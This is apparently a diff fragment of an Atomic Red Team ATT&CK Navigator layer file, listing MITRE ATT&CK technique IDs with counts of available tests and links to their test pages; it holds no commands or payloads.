Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":117,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View 